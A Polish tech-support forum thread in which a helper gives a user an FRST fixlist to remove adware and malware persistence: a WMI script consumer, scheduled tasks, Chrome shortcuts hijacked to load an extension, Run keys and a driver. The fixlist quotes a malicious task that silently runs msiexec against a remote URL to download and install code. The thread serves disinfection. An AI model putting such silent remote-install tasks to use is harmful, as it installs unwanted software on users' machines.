x-kom hosting

ActiveScriptEventConsumer win 10

Korzenioslaw
utworzono
utworzono

Program ADWcleaner wykrył ActiveScriptEventConsumer i nie da się go usunąć zrobiłem logi programem FRST i nie wiem co dalej zrobić, ma ktoś jakieś rozwiązania? Oszaleję tu chyba ;(

Addition.txt

FRST.txt

Shortcut.txt

Twój_Anioł_Stróż
komentarz
komentarz (edytowane)

Są infekcje.

 

Otwórz Notatnik i wklej w nim:

Cytuj

WMI_ActiveScriptEventConsumer_ASEC: <===== UWAGA

Task: {5D3C2B04-557E-405E-83E7-0E96F552A72E} - System32\Tasks\Nimasy Engine => C:\Program Files (x86)\Divosh\plejither.exe
Task: {88C7D66B-BDB1-48C3-9A4E-BC2C20CBF0BD} - System32\Tasks\Kokock => "msiexec" /i hxxp://d2buh1bf1g584w.cloudfront.net/msi/rel.php?u=WDCXWD10SPCX-24HWST1_WD-WX81A96D5X8XD5X8X&amp;v=2017220 /q
Task: {A25B91D7-D022-4582-9AFB-CE79ED41686F} - System32\Tasks\Supory Renew => C:\Program Files (x86)\Zuqtyplistain\bizs.exe [2017-01-26] (Glarysoft Ltd)
ShortcutWithArgument: C:\Users\Szymon\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Google Chrome.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) ->  --load-extension="C:\Users\Szymon\AppData\Local\kemgadeojglibflomicgnfeopkdfflnk" hxxp://qtipr.com/
ShortcutWithArgument: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) ->  --load-extension="C:\Users\Szymon\AppData\Local\kemgadeojglibflomicgnfeopkdfflnk" hxxp://qtipr.com/
ShortcutWithArgument: C:\Users\Public\Desktop\Google Chrome.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) ->  --load-extension="C:\Users\Szymon\AppData\Local\kemgadeojglibflomicgnfeopkdfflnk" hxxp://qtipr.com/
HKU\S-1-5-21-2102571934-1981671060-1361596354-1001\...\Run: [AKW0heptBN.exe] => C:\Users\Szymon\AppData\Roaming\{5be-dd-a5-134f7-95225-1dd1-98d0d}\AKW0heptBN.exe 1 0
HKLM\...\Providers\nunokmv5: C:\Program Files (x86)\Supory Renew\local64spl.dll
ShellExecuteHooks: Brak nazwy - {4E2675C8-DE3F-11E6-B140-64006A5CFC23} -  -> Brak pliku
ShellExecuteHooks: Brak nazwy - {5AD340E8-F445-11E6-B566-64006A5CFC23} -  -> Brak pliku
ShellIconOverlayIdentifiers: [00avg] -> {472083B0-C522-11CF-8763-00608CC02F24} =>  -> Brak pliku
GroupPolicy: Ograniczenia - Chrome <======= UWAGA
RemoveDirectory: C:\Program Files (x86)\Divosh
RemoveDirectory: C:\Program Files (x86)\Zuqtyplistain
RemoveDirectory: C:\Users\Szymon\AppData\Roaming\{5be-dd-a5-134f7-95225-1dd1-98d0d}
RemoveDirectory: C:\Program Files (x86)\Supory Renew
RemoveDirectory: C:\Users\Szymon\AppData\Roaming\Paceghvoqs
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\KMSpico\AutoPico.lnk
C:\Program Files (x86)\metadata
SearchScopes: HKU\S-1-5-21-2102571934-1981671060-1361596354-1001 -> {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL =
R2 Verqage; C:\Program Files (x86)\Zuqtyplistain\ligeshpisaleBld.dll [149504 2017-01-26] () [Brak podpisu cyfrowego]
S1 unyivjoh; \??\C:\WINDOWS\system32\drivers\unyivjoh.sys [X]
EmptyTemp:


Plik zapisz pod nazwą fixlist.txt i umieść obok FRST.exe
Uruchom FRST i kliknij przycisk Fix (NAPRAW).

 

----------------------
Jeśli będzie OK, to będziemy kończyć:
Otwórz Notatnik i wklej w nim:

Cytuj

DeleteQuarantine:


Plik zapisz pod nazwą fixlist.txt i umieść obok FRST. Uruchom FRST i kliknij w Fix (NAPRAW).
przez SHIFT+DEL usuń pozostały folder C:\FRST.

.

  • Dobra wypowiedź 1
Korzenioslaw
komentarz
komentarz

Wielkie dzięki, pomogłeś mi ;) Dobrze, że są jeszcze tacy ludzie na świecie, jestem Ci bardzo wdzięczny, pozdrawiam i miłego dnia życzę. :D 

Bez tytułu.png

Wciąż szukasz rozwiązania problemu? Napisz teraz na forum!

Możesz zadać pytanie bez konieczności rejestracji - wystarczy, że wypełnisz formularz.

×
×
  • Dodaj nową pozycję...

Powiadomienie o plikach cookie

Strona wykorzystuje pliki cookies w celu prawidłowego świadczenia usług i wygody użytkowników. Warunki przechowywania i dostępu do plików cookies możesz zmienić w ustawieniach przeglądarki.